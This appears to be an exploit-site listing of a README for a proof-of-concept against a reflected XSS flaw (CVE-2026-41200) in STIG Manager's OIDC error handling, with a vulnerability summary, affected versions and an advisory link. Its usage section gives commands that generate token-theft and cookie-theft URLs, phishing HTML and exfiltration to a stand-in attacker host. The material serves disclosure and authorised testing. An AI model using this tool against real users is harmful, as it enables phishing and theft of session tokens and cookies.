Share
## https://sploitus.com/exploit?id=F2CA6D37-95E7-5BBF-AD0C-A6FBE0255DFF
# CVE-2026-41200 โ€” STIG Manager OIDC Reflected XSS PoC

Conceptual Proof of Concept for the reflected Cross-Site Scripting (XSS) vulnerability in STIG Manager versions 1.5.10 through 1.6.7.

## Vulnerability Summary

A reflected XSS vulnerability exists in the STIG Manager Web App OIDC authentication error handling code. The `error` and `error_description` query parameters returned by the OIDC provider are written directly to the DOM via `innerHTML` without HTML escaping. An attacker who can craft a malicious URL and convince a user to follow it can execute arbitrary JavaScript in the application context.

The vulnerability is most severe when the targeted user has an active STIG Manager session in another browser tab โ€” injected code can communicate with the SharedWorker managing the access token, enabling authenticated API requests on behalf of the victim.

- **CVE**: CVE-2026-41200
- **CVSS 4.0**: 8.5 (HIGH)
- **Affected**: NUWCDIVNPT/stig-manager >= 1.5.10, < 1.6.8
- **Patched**: v1.6.8
- **Advisory**: [GHSA-wg33-j3rv-jq72](https://github.com/NUWCDIVNPT/stig-manager/security/advisories/GHSA-wg33-j3rv-jq72)
- **Article**: [hunt-benito.com](https://www.hunt-benito.com/cve-2026-41200-stig-manager-oidc-reflected-xss/)

## Usage

```bash
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker

# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple

# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html

# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
  -c https://stig-manager.example.com/auth/callback \
  -a https://stig-manager.example.com \
  -e https://attacker.example.com
```

## Disclaimer

This tool is provided for **educational purposes and authorised security research only**.

- Only use against installations you own or have explicit authorisation to test.
- Unauthorised access to computer systems is illegal in most jurisdictions.
- The authors assume no liability for misuse of this tool.